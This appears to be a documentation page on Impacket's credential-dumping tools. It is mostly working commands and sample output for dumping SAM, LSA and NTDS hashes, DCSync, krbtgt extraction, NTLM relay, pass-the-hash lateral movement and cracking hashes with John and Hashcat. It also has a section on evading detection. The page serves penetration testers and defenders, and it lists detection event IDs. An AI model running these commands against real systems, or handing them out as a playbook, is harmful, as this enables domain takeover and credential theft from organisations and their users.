Credential Dumping Tools

Impacket provides powerful tools for extracting credentials from Windows systems, both locally and remotely.

secretsdump.py

The most comprehensive credential dumping tool. Extracts SAM, LSA secrets, cached credentials, and NTDS.dit without executing code on the target.

Dump Methods

Remote Dumping
DCSync (Domain Controller)
Local Files
VSS Method

# Dump all credentials (SAM, LSA, cached, NTDS if DC)
secretsdump.py DOMAIN/user:password@target

# Pass-the-hash
secretsdump.py DOMAIN/user@target -hashes LMHASH:NTHASH

# Kerberos authentication
secretsdump.py DOMAIN/user@target -k -no-pass -dc-ip DC_IP

# DCSync - replicate credentials from DC (requires replication rights)
secretsdump.py DOMAIN/user:pass@DC_IP -just-dc

# Dump only NTLM hashes (faster)
secretsdump.py DOMAIN/user:pass@DC_IP -just-dc-ntlm

# Dump specific user
secretsdump.py DOMAIN/user:pass@DC_IP -just-dc-user Administrator

# Include password history
secretsdump.py DOMAIN/user:pass@DC_IP -history

# Parse local registry hives
secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL

# Parse NTDS.dit
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

# With bootkey
secretsdump.py -sam SAM -system SYSTEM -bootkey BOOTKEY LOCAL

# Use Volume Shadow Copy (VSS) - no code execution
secretsdump.py DOMAIN/user:pass@target -use-vss

# VSS for NTDS.dit on DC
secretsdump.py DOMAIN/user:pass@DC -use-vss -just-dc-ntlm

Advanced Options

Filtering & Selection

# Dump only SAM (skip LSA secrets)
secretsdump.py domain/user:pass@target -skip-security

# Dump only LSA secrets (skip SAM)
secretsdump.py domain/user:pass@target -skip-sam

# LDAP filter for specific users
secretsdump.py domain/user:pass@dc -ldapfilter "(memberOf=CN=Domain Admins,CN=Users,DC=domain,DC=com)"

# Skip specific users
secretsdump.py domain/user:pass@dc -skip-user "krbtgt,Guest"

# Show password last set dates
secretsdump.py domain/user:pass@dc -pwd-last-set

# Show account status (enabled/disabled)
secretsdump.py domain/user:pass@dc -user-status

Output Options

# Save to file
secretsdump.py domain/user:pass@target -outputfile credentials
# Creates: credentials.ntds, credentials.sam, credentials.secrets

# Resume interrupted dump
secretsdump.py domain/user:pass@dc -resumefile resume.txt

Execution Methods

# Specify execution method for registry operations
secretsdump.py domain/user:pass@target -exec-method smbexec
secretsdump.py domain/user:pass@target -exec-method wmiexec
secretsdump.py domain/user:pass@target -exec-method mmcexec

# Use remote VSS via WMI (no code execution)
secretsdump.py domain/user:pass@target -use-remoteSSWMI

Example Output

$ secretsdump.py CORP/[email protected] -hashes :8846f7eaee8fb117ad06bdd830b7586c
Impacket v0.12.0 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x12345678901234567890123456789012
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
user1:1001:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
[*] Dumping cached domain logon information (domain/username:hash)
CORP.LOCAL/jdoe:$DCC2$10240#jdoe#e4e938d12fe5974dc42a90120bd9c90f
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
CORP\WIN-SERVER01$:aes256-cts-hmac-sha1-96:abcd1234...
[*] DPAPI_SYSTEM
dpapi_machinekey:0x1234567890abcdef
dpapi_userkey:0xfedcba0987654321
[*] Cleaning up...

Common Use Cases

Domain Compromise
Local Admin Access
Offline Analysis

# 1. Dump all domain credentials from DC
secretsdump.py DOMAIN/DA:password@DC_IP -just-dc -outputfile domain_hashes

# 2. Extract krbtgt for Golden Ticket
secretsdump.py DOMAIN/DA:password@DC_IP -just-dc-user krbtgt

# 3. Dump with history for password analysis
secretsdump.py DOMAIN/DA:password@DC_IP -history

# 1. Dump local SAM
secretsdump.py ./admin:password@WORKSTATION

# 2. Extract cached domain credentials
secretsdump.py DOMAIN/admin@WORKSTATION -hashes :HASH

# 3. Get LSA secrets (auto-logon passwords, service accounts)
secretsdump.py ./admin@WORKSTATION -hashes :HASH

# 1. Extract hives with reg.py or other methods
reg.py domain/user:pass@target save -keyName HKLM\SAM sam.save
reg.py domain/user:pass@target save -keyName HKLM\SYSTEM system.save
reg.py domain/user:pass@target save -keyName HKLM\SECURITY security.save

# 2. Parse offline
secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

Get-GPPPassword.py

Extracts credentials from Group Policy Preferences (GPP) in SYSVOL. Finds passwords stored in Groups.xml.

Usage

# Scan SYSVOL for GPP passwords
Get-GPPPassword.py DOMAIN/user:password@DC_IP

# With NTLM hash
Get-GPPPassword.py DOMAIN/user@DC -hashes LMHASH:NTHASH

# Kerberos authentication
Get-GPPPassword.py DOMAIN/user@DC -k -no-pass -dc-ip DC_IP

Example Output

$ Get-GPPPassword.py CORP/user:[email protected]
Impacket v0.12.0 - Copyright 2023 Fortra

[*] Searching \\10.0.0.1\SYSVOL\corp.local\Policies
[+] Found credentials in {31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
UserName: localadmin
Password: P@ssw0rd123!
Changed: 2023-01-15 10:30:00

GetLAPSPassword.py

Retrieves LAPS (Local Administrator Password Solution) passwords from Active Directory.

Usage

# Get LAPS password for specific computer
GetLAPSPassword.py DOMAIN/user:password@DC -computer WIN10-PC01

# Get all LAPS passwords (requires read permissions)
GetLAPSPassword.py DOMAIN/user:password@DC

# Kerberos authentication
GetLAPSPassword.py DOMAIN/user@DC -k -no-pass -computer TARGET$

Example Output

$ GetLAPSPassword.py CORP/admin:[email protected] -computer WIN10-01
Impacket v0.12.0 - Copyright 2023 Fortra

Computer: WIN10-01$
Password: #Kp9.mV2qW!xR5n
Expiration: 2024-03-15 14:22:35

Additional Tools

dpapi.py

Decrypt DPAPI-protected data (credentials, certificates, keys).

# Decrypt DPAPI blob with master key
dpapi.py blob -file blob.bin -mkfile masterkey

# Decrypt credential file
dpapi.py credential -file credential.bin -mkfile masterkey

# Use domain backup key
dpapi.py blob -file blob.bin -pvk domain_backup.pvk

mimikatz.py

Execute Mimikatz-style DPAPI operations.

# Execute against remote machine
mimikatz.py DOMAIN/user:password@target

# With NTLM hash
mimikatz.py DOMAIN/user@target -hashes :NTHASH

ntlmrelayx.py

Relay NTLM authentication to dump credentials (advanced).

# Relay to SMB and dump SAM
ntlmrelayx.py -t smb://target -smb2support

# Relay and execute secretsdump
ntlmrelayx.py -t smb://target --dump-ntds

# Relay to multiple targets
ntlmrelayx.py -tf targets.txt -smb2support

Password Cracking

After dumping credentials, crack them with John the Ripper or Hashcat:

John the Ripper
Hashcat
Pass-the-Hash

# Extract NTLM hashes to file
secretsdump.py domain/user:pass@dc -just-dc-ntlm -outputfile hashes

# Crack with John
john --format=NT hashes.ntds --wordlist=rockyou.txt
john --format=NT hashes.ntds --rules --wordlist=wordlist.txt

# Show cracked passwords
john --show --format=NT hashes.ntds

# Prepare hash file (format: username:hash)
cat hashes.ntds | cut -d: -f1,4 > ntlm.txt

# Crack NTLM hashes
hashcat -m 1000 ntlm.txt rockyou.txt

# Crack with rules
hashcat -m 1000 ntlm.txt wordlist.txt -r best64.rule

# Crack cached domain credentials ($DCC2)
hashcat -m 2100 cached.txt wordlist.txt

# Use dumped NTLM hash directly (no cracking needed)
psexec.py DOMAIN/user@target -hashes :NTHASH
wmiexec.py DOMAIN/user@target -hashes :NTHASH
smbexec.py DOMAIN/user@target -hashes :NTHASH

# Lateral movement with hash
crackmapexec smb targets.txt -u admin -H NTHASH

Detection & Evasion

Credential dumping activities are heavily monitored in modern environments. These techniques generate significant logs and alerts.

Detection Indicators

Event Logs Generated

Event ID 4688: Process creation (reg.exe, vssadmin.exe)
Event ID 4663: Registry access to SAM/SECURITY/SYSTEM
Event ID 5145: Network share access (ADMIN $, C$ )
Event ID 4662: Directory Service Access (DCSync)
Event ID 4624/4672: Privileged logon

Network Indicators

SMB connections to ADMIN $/C$ shares
RPC calls to SAMR/DRSUAPI
Registry service activation
Volume Shadow Copy creation

Evasion Techniques

# Use VSS method (less suspicious than remote registry)
secretsdump.py domain/user:pass@target -use-vss

# Use Kerberos instead of NTLM
secretsdump.py domain/user:pass@target -k -dc-ip DC

# Limit scope to avoid mass dumping alerts
secretsdump.py domain/user:pass@dc -just-dc-user specific_user

# Use legitimate backup account
secretsdump.py DOMAIN/backup_admin:pass@target

Common Issues

Access Denied / Insufficient Privileges

# Verify admin access
crackmapexec smb target -u user -p password

# Check for local admin
smbmap -H target -u user -p password

# For DCSync, verify replication rights
# User needs "Replicating Directory Changes" and 
# "Replicating Directory Changes All" permissions

Remote Registry Service

# secretsdump.py starts RemoteRegistry automatically
# If it fails, check:

# 1. Service permissions
services.py domain/user:pass@target list

# 2. Try VSS method instead
secretsdump.py domain/user:pass@target -use-vss

# 3. Use different execution method
secretsdump.py domain/user:pass@target -exec-method wmiexec

DCSync Errors

# Error: "The user has insufficient access rights"
# Solution: User needs replication permissions

# Check current user's group memberships
GetADUsers.py domain/user:pass@dc -user current_user

# Alternative: Use domain admin or backup operator account
secretsdump.py DOMAIN/Administrator:pass@dc -just-dc

Best Practices

Authorization

Only dump credentials on systems you’re authorized to test

Secure Storage

Encrypt and securely store dumped credentials

Clean Up

Remove artifacts and restore services to original state

Documentation

Document all dumps for audit trail and reporting

Next Steps

Kerberos Attacks

Use dumped credentials for Kerberos attacks

Remote Execution

Execute commands with dumped credentials

Lateral Movement

Move across the network with credentials

Get Started

Core Protocols

Authentication

Examples & Tools

Advanced Topics

Credential Dumping Tools

secretsdump.py

Dump Methods

Advanced Options

Example Output

Common Use Cases

Get-GPPPassword.py

Usage

Example Output

GetLAPSPassword.py

Usage

Example Output

Additional Tools

dpapi.py

mimikatz.py

ntlmrelayx.py

Password Cracking

Detection & Evasion

Detection Indicators

Common Issues

Best Practices

Authorization

Secure Storage

Clean Up

Documentation

Next Steps

Kerberos Attacks

Remote Execution

Lateral Movement

Build docs developers (and LLMs) love

Get Started

Core Protocols

Authentication

Examples & Tools

Advanced Topics

​secretsdump.py

​Dump Methods

​Advanced Options

​Example Output

​Common Use Cases

​Get-GPPPassword.py

​Usage

​Example Output

​GetLAPSPassword.py

​Usage

​Example Output

​Additional Tools

​dpapi.py

​mimikatz.py

​ntlmrelayx.py

​Password Cracking

​Detection & Evasion

​Detection Indicators

​Common Issues

​Best Practices

Authorization

Secure Storage

Clean Up

Documentation

​Next Steps

Kerberos Attacks

Remote Execution

Lateral Movement

Build docs developers (and LLMs) love

secretsdump.py

Dump Methods

Advanced Options

Example Output

Common Use Cases

Get-GPPPassword.py

Usage

Example Output

GetLAPSPassword.py

Usage

Example Output

Additional Tools

dpapi.py

mimikatz.py

ntlmrelayx.py

Password Cracking

Detection & Evasion

Detection Indicators

Common Issues

Best Practices

Next Steps